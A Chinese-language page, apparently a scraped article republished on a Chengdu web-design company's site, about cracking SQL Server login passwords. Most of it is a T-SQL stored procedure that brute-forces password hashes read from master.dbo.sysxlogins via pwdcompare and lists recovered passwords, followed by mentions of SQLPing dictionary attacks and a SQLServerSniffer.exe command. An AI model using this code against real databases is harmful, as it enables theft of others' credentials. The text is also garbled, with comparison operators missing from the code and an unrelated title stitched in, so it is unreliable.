進(jìn)入SQL

成都創(chuàng)新互聯(lián)公司堅(jiān)持“要么做到,要么別承諾”的工作理念,服務(wù)領(lǐng)域包括:成都網(wǎng)站建設(shè)、成都網(wǎng)站制作、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣等服務(wù),滿足客戶于互聯(lián)網(wǎng)時(shí)代的東莞網(wǎng)站設(shè)計(jì)、移動(dòng)媒體設(shè)計(jì)的需求,幫助企業(yè)找到有效的互聯(lián)網(wǎng)解決方案。努力成為您成熟可靠的網(wǎng)絡(luò)建設(shè)合作伙伴!
SERVER企業(yè)管理器,用本地用戶登錄
然后進(jìn)入數(shù)據(jù)庫管理-》里面有一個(gè)安全管理,角色管理
進(jìn)去就可以看到對應(yīng)的用戶了
右擊用戶,可以更改相應(yīng)的密碼
具體操作如下:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO
/*--窮舉法破解 SQL Server 用戶密碼
可以破解中文,特殊字符,字符+尾隨空格的密碼
為了方便顯示特殊字符的密碼,在顯示結(jié)果中,顯示了組成密碼的ASCII,理論上可以破解任意位數(shù)的密碼,條件是電腦配置足夠,時(shí)間足夠.
/*--調(diào)用示例
exec p_GetPassword
--*/
create proc p_GetPassword
@username sysname=null, --用戶名,如果不指定,則列出所有用戶
@pwdlen int=2 --要破解的密碼的位數(shù),默認(rèn)是2位及以下的
as
set @pwdlen=case when isnull(@pwdlen,0)1 then 1 else @pwdlen-1 end
select top 255 id=identity(int,0,1) into #t from syscolumns
alter table #t add constraint pk_#t primary key(id)
select name,password
,type=case when xstatus2048=2048 then 1 else 0 end
,jm=case when password is null then 1 else 0 end
,pwdstr=cast('' as sysname)
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
declare @l int
select @l=0
,@s1='char(aa.id)'
,@s2='cast(aa.id as varchar)'
,@s3=',#t aa'
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')
while exists(select 1 from #pwd where jm=0 and @l@pwdlen)
begin
select @l=@l+1
,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'
,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')
end
select 用戶名=name,密碼=pwdstr,密碼ASCII=pwd
from #pwd
go
SQLServer加密密碼的函數(shù)pwdencrypt(),在sp_addlogin存儲(chǔ)進(jìn)程中,又發(fā)現(xiàn)了口令比較的函數(shù)pwdcompare(),在sp_password存儲(chǔ)進(jìn)程中,雖然是單向加密的,但是能通過窮舉來猜到sa的密碼,固然其他的登錄帳戶的密碼也是可以猜到的最基本的SQLServer密碼破解。SQLPing1:發(fā)現(xiàn)空白的超級管理員密碼
SQLPing2還可以在SQLServer上運(yùn)行字典攻擊。這就像載入你自己的用戶賬號和密碼列表1樣簡單,
在另外一臺電腦上裝數(shù)據(jù)庫,然后將加密所在存儲(chǔ)的數(shù)據(jù)庫恢復(fù)上去即可。
運(yùn)行此類的命令可以使用:開始、運(yùn)行;
里邊輸入SQLServerSniffer.exe
1433
c:\1.txt
前提你需要將SQLServerSniffer.exe
拷貝到SYSTEM32文件夾下,或者你的命令為:
X:\XXXX\SQLServerSniffer.exe
1433
c:\1.txt
_就是要加上相對路徑
標(biāo)題名稱:破譯sqlserver,破譯宋美齡長壽密碼
文章出自:http://chinadenli.net/article47/dsejpej.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設(shè)計(jì)、網(wǎng)站設(shè)計(jì)公司、小程序開發(fā)、ChatGPT、網(wǎng)站建設(shè)、手機(jī)網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)